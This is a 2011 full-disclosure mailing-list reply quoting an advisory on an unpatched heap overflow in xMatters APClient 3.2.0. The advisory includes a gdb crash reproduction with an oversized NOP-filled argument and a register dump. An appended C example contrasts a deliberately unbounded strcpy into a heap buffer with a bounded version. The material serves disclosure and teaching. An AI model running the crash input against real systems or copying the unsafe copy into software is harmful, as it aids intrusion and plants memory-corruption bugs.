Date: Thu, 28 Apr 2011 18:02:41 +0100
From: Cal Leeming <cal@...whisper.co.uk>
To: Juan Sacco <jsacco@...ecurityresearch.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

On a side note, anyone here ever used any of the xmatters engines?? Care to
give a small review??

On Thu, Apr 28, 2011 at 4:03 PM, Juan Sacco
<jsacco@...ecurityresearch.com> wrote:

>  Information
>  --------------------
>  Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
>  Version: APClient 3.2.0 (native)
>  Software : xMatters AlarmPoint
>  Vendor Homepage : http://www.xmatters.com
>  Vulnerability Type : Heap Buffer Overflow
>  Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
>  Severity : High
>  Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>
>
>  Description
>  ------------------
>  The AlarmPoint Java Server consists of a collection of software
>  components and software APIs designed to provide a flexible and
>  powerful set of tools for integrating various applications to
>  AlarmPoint.
>
>  Details
>  -------------------
>  AlarmPoint APClient is affected by a Heap Overflow vulnerability in
>  version APClient 3.2.0 (native)
>
>  A heap overflow condition is a buffer overflow, where the buffer that
>  can be overwritten is allocated in the heap portion of memory, generally
>  meaning that the buffer was allocated using a routine such as the POSIX
>  malloc() call.
>  https://www.owasp.org/index.php/Heap_overflow
>
>
>  Exploit as follows:
>  Submit a malicious file containing the exploit
>  root@...gateway:/opt/alarmpointsystems/integrationagent/bin$
>  ./APClient.bin --submit-file maliciousfile.hex
>  or
>  (gdb) run `python -c 'print "\x90"*16287'`
>  Starting program:
>  /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
>  'print "\x90"*16287'`
>
>  Program received signal SIGSEGV, Segmentation fault.
>  0x0804be8a in free ()
>  (gdb) i r
>  eax            0xa303924        170932516
>  ecx            0xbfb8   49080
>  edx            0xa303924        170932516
>  ebx            0x8059438        134583352
>  esp            0xbfff3620       0xbfff3620
>  ebp            0xbfff3638       0xbfff3638
>  esi            0x8059440        134583360
>  edi            0x80653f0        134632432
>  eip            0x804be8a        0x804be8a <free+126>
>  eflags         0x210206 [ PF IF RF ID ]
>  cs             0x73     115
>  ss             0x7b     123
>  ds             0x7b     123
>  es             0x7b     123
>  fs             0x0      0
>  gs             0x33     51
>  (gdb)
>
>
>  Solution
>  -------------------
>  No patches are available at this time.
>
>  Credits
>  -------------------
>  Manually discovered by Insecurity Research Labs
>  Juan Sacco - http://www.insecurityresearch.com
>
> --
>  --
>  _________________________________________________
>  Insecurity Research - Security auditing and testing software
>  Web: http://www.insecurityresearch.com
>  Insect Pro 2.5 was released, stay tuned
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

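As an added illustration of the bug class in the quoted advisory (this is not APClient code and not part of either message): a fixed-size heap buffer filled from a command-line argument, first in the unbounded form the advisory describes, then in a bounded form that rejects an oversized argument such as the 16287-byte string above instead of copying it. ARG_BUF_SIZE, the function names and the 0x90-filled probe are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ARG_BUF_SIZE 256   /* hypothetical fixed capacity of the heap buffer */

/* Unsafe pattern, kept for contrast: nothing bounds the copy, so an argument of
 * ARG_BUF_SIZE bytes or more overruns the chunk into neighbouring heap metadata. */
char *copy_arg_unsafe(const char *arg)
{
    char *buf = malloc(ARG_BUF_SIZE);
    if (buf != NULL)
        strcpy(buf, arg);               /* corrupted metadata surfaces later, in free() */
    return buf;
}

/* Hardened version: look for the terminator only within the capacity, reject input
 * that does not fit, copy exactly the verified length. Errors: 1 too long, 2 no memory. */
char *copy_arg_bounded(const char *arg, int *err)
{
    const char *nul = memchr(arg, '\0', ARG_BUF_SIZE);   /* bounded scan, stops at first NUL */
    *err = 0;
    if (nul == NULL) { *err = 1; return NULL; }          /* no NUL in 256 bytes: reject */
    size_t len = (size_t)(nul - arg);                    /* at most ARG_BUF_SIZE - 1 */
    char *buf = malloc(ARG_BUF_SIZE);
    if (buf == NULL) { *err = 2; return NULL; }
    memcpy(buf, arg, len + 1);                           /* terminator included, in bounds */
    return buf;
}

/* Feeds a constructed n-byte argument of 0x90 bytes (the advisory's NOP filler) to
 * the bounded copy and returns its error code: 0 accepted, 1 rejected as too long. */
int bounded_result(size_t n)
{
    char *arg = malloc(n + 1);
    if (arg == NULL) return 2;
    memset(arg, 0x90, n);
    arg[n] = '\0';
    int err;
    char *buf = copy_arg_bounded(arg, &err);
    free(buf);                          /* free(NULL) is a no-op */
    free(arg);
    return err;
}
```

Under AddressSanitizer or valgrind the unsafe variant reports the write past the 256-byte chunk at the strcpy itself, rather than at the later free() where the advisory's crash appears.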
